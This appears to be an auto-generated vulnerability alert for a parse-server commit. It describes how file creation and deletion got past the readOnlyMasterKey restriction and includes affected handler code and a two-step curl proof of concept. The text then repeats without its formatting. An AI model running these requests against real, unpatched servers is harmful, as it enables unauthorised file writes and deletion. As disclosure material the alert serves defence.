Potential Security Vulnerability Detected
Repository: parse-community/parse-server
Commit: 036365a
Author: Manuel
Date: 2026-03-05T01:45:53Z
Commit Message
fix: File creation and deletion bypasses `readOnlyMasterKey` write restriction ([GHSA-xfh7-phr7-gr2x](https://github.com/parse-community/parse-server/security/advisories/GHSA-xfh7-phr7-gr2x)) (#10095)
Pull Request
PR: #10095 - fix: File creation and deletion bypasses readOnlyMasterKey write restriction (GHSA-xfh7-phr7-gr2x)
Labels: state:released-alpha
Description:
Pull Request
Issue
File creation and deletion bypasses readOnlyMasterKey write restriction ([GHSA-xfh7-phr7-gr2x](GHSA-xfh7-phr7-gr2x))
Tasks
<!-- Check completed tasks and delete tasks t...
Analysis
Vulnerability Type: Privilege Escalation
Severity: High
Description
Before the patch, the readOnlyMasterKey was intended to restrict all write operations, but file creation and deletion operations bypassed this restriction. This allowed an attacker with a read-only master key to create and delete files, effectively escalating privileges beyond intended access controls. The patch adds explicit checks to block file creation and deletion requests when authenticated with a read-only master key, enforcing the expected write restrictions.
Affected Code
async createHandler(req, res, next) {
// No check for readOnlyMasterKey; allowed file creation
const config = req.config;
const user = req.auth.user;
const isMaster = req.auth.isMaster;
...
}
async deleteHandler(req, res, next) {
// No check for readOnlyMasterKey; allowed file deletion
const { filesController } = req.config;
const filename = FilesRouter._getFilenameFromParams(req);
...
}
Proof of Concept
1. Use the readOnlyMasterKey to send a POST request to create a file:
curl -X POST \
-H "X-Parse-Application-Id: yourAppId" \
-H "X-Parse-Master-Key: readOnlyMasterKey" \
-H "Content-Type: text/plain" \
--data-binary "file content" \
https://your-parse-server/files/readonly-create-exploit.txt
Expected behavior before patch: file is created despite readOnlyMasterKey being read-only.
2. Use the readOnlyMasterKey to send a DELETE request to delete the file:
curl -X DELETE \
-H "X-Parse-Application-Id: yourAppId" \
-H "X-Parse-Master-Key: readOnlyMasterKey" \
https://your-parse-server/files/readonly-create-exploit.txt
Expected behavior before patch: file is deleted despite readOnlyMasterKey being read-only.
This demonstrates privilege escalation by bypassing intended write restrictions of the readOnlyMasterKey.
This issue was automatically created by Vulnerability Spoiler Alert.
Detected at: 2026-03-05T06:01:20.257Z
Potential Security Vulnerability Detected
Repository: parse-community/parse-server
Commit: 036365a
Author: Manuel
Date: 2026-03-05T01:45:53Z
Commit Message
Pull Request
PR: #10095 - fix: File creation and deletion bypasses
readOnlyMasterKeywrite restriction (GHSA-xfh7-phr7-gr2x)Labels: state:released-alpha
Description:
Pull Request
Issue
File creation and deletion bypasses
readOnlyMasterKeywrite restriction ([GHSA-xfh7-phr7-gr2x](GHSA-xfh7-phr7-gr2x))Tasks
<!-- Check completed tasks and delete tasks t...
Analysis
Vulnerability Type: Privilege Escalation
Severity: High
Description
Before the patch, the
readOnlyMasterKeywas intended to restrict all write operations, but file creation and deletion operations bypassed this restriction. This allowed an attacker with a read-only master key to create and delete files, effectively escalating privileges beyond intended access controls. The patch adds explicit checks to block file creation and deletion requests when authenticated with a read-only master key, enforcing the expected write restrictions.Affected Code
Proof of Concept
This issue was automatically created by Vulnerability Spoiler Alert.
Detected at: 2026-03-05T06:01:20.257Z